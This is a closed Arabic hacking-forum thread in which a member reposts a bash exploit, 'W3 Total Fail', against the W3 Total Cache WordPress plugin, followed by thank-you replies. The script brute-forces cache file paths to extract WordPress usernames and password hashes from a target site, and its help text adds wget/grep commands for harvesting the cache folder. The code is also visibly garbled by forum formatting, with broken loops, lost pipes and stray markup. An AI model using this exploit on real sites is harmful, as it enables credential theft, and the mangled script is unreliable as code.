حالة الموضوع:
مغلق
  1. Hacker-DZ

    Hacker-DZ Developer

    الأنتساب:
    ‏2 مايو 2012
    المشاركات:
    36
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    [INFO]Wordpress Remote Exploit - W3 Total Cache[/INFO]
    source
    [NOTE]w3-total-fail - Intelligently guesses hash values in order to extract Wordpress password hashes via W3 Total Cache.[/NOTE]
    كود PHP:
    #!/bin/bash
    # (C) Copyright 2012 Jason A. Donenfeld <[email protected]>. All Rights Reserved.
    #
    # |---------------|
    # | W3 Total Fail |
    # |    by zx2c4   |
    # |---------------|
    #
    # For more info, see built-in help text.
    # exp:w3-total-fail.sh
    #
    # This affects W3 Total Cache <= 0.9.2.4.

    set -f


    printf 
    "\033[1m\033[31m"
    echo "<===== W3 Total Fail =====>"
    echo "<                         >"
    echo "<        by zx2c4         >"
    echo "<                         >"
    echo "<=========================>"
    echo
    echo
    printf "\033[0m\033[1m"
    echo "W3 Total Fail works by attempting to guess SQL queries that might"
    echo "contain important password hashes. It walks through"
    printf "\033[0m"
    echo "     http://\$wordpress/wp-content/w3tc/dbcache/..."
    printf "\033[1m"
    echo "until it's found the right files. If this directory has directory"
    echo "index listings turned on, you might have more luck downloading the"
    echo "entire folder and grepping locally for patterns, like so:"
    printf "\033[0m"
    echo "    \$ wget -np -r http://\$wordpress/wp-content/w3tc/dbcache/"
    echo "    \$ grep -Ra user_pass ."
    printf "\033[1m"
    echo "If directory listings are not available, then this is the tool for"
    echo "you, as it will try to brute force possible w3tc keys. It will try"
    echo "25 user ids and 25 site ids. Adjust the script for more or less range."
    echo
    echo 
    "Enjoy!"
    echo
    echo 
    "- zx2c4"
    echo "Dec 24, 2012"
    echo
    printf "\033[0m"

    printf "\033[0m\033[36m"
    echo "Usage: $0 HOST [URLBASE] [DBPREFIX]"
    echo
    echo 
    "HOST should be the name of the host that is stored by wordpress. It"
    echo "may be the actual host name of the server, or it might be something"
    echo "different, depending on how wordpress is configured."
    echo "Example: blog.zx2c4.com"
    echo
    echo 
    "URLBASE is the base URL of the wordpress blog which are prefixed in"
    echo "forming HTTP requests. If not specified it will default to http://\$HOST"
    echo "Example: http://blog.zx2c4.com or https://someblahblasite.com/my_blog"
    echo
    echo 
    "DBPREFIX is the wordpress prefix used for database table names. It"
    echo "is often \"wp_\", which DBPREFIX defaults to if this argument is"
    echo "unspecified. Some wordpress installations will use an empty prefix,"
    echo "and others use a site-specific prefix. Most, however, will use the"
    echo "default."
    echo "Example: wp_"
    echo
    printf "\033[0m"

    if [ $# -lt 1 ]; then
       
    echo "Error: HOST is a required argument."
       
    exit 1
    fi

    host
    ="$1"
    urlbase="${2:-http://$host}"
    db_prefix="$3"
    [ $# -lt 3 ] && db_prefix="wp_"

    for site_id in {1..250; do for user_id in {1..25}; do
       
    query="SELECT * FROM ${db_prefix}users WHERE ID = '$user_id'"
       
    key="w3tc_${host}_${site_id}_sql_$(echo -n "$query"|md5sum|cut -d ' ' -f 1)"
       
    hash="$(echo -n "$key"|md5sum|cut -d ' ' -f 1)"
       
    hash_path="${hash:0:1}/${hash:1:1}/${hash:2:1}/${hash}"
       
    url="$urlbase/wp-content/w3tc/dbcache/$hash_path"

       
    printf "\033[33m"
       
    echo -"Attempting"
       
    printf "\033[0m"
       
    echo $url..."
        
    curl -"$urltail -+tr -'\n' sed -n  's/.*"user_login";s:[0-9]\+:"\([^"]*\)";s:[0-9]\+:"user_pass";s:[0-9]\+:"\([^"]*\)".*/\x1b[1m\x1b[32mUsername:  \1\nPassword hash: \2\x1b[0m\n/p'

    donedone 
    END__VBULLETIN__CODE__SNIPPET ?>

    video


    [YOUTUBE]sqZ_zYLFDSo[/YOUTUBE]​
     
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    [warning]هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.[/warning] ​
     
  3. ♀GENI RYODAN♀

    ♀GENI RYODAN♀ Developer

    الأنتساب:
    ‏7 مايو 2012
    المشاركات:
    38
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    دعـــس المـــلـــغـــمـــيـــن
    الإقامة:
    تـــونـــس
    رد: Wordpress Remote Exploit - W3 Total Cache

    تسلم اخى
    الله يعطيك العافيه
     
  4. A.R.K.A.N

    A.R.K.A.N DeveloPer Plus

    الأنتساب:
    ‏8 يناير 2013
    المشاركات:
    152
    الإعجابات المتلقاة:
    12
    نقاط الجائزة:
    18
    الإقامة:
    hacker
    رد: Wordpress Remote Exploit - W3 Total Cache

    وعليكم السلأم ورحمه الله وبركـأته ,

    مـأشاء الله تبـأرك الله ~

    الله يعطيك العـأفية ~ ومـأننحرم من ابدأعك ~
     
  5. ADNAN

    ADNAN Developer

    الأنتساب:
    ‏29 أكتوبر 2012
    المشاركات:
    84
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    الأرض
    رد: Wordpress Remote Exploit - W3 Total Cache

    بارك الله فيك اخي الكريم *:"​
     
  6. SiL3nT M4n

    SiL3nT M4n Developer

    الأنتساب:
    ‏19 مايو 2012
    المشاركات:
    55
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    im Syrian
    رد: Wordpress Remote Exploit - W3 Total Cache

    مميز اخي بارك الله فيك
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة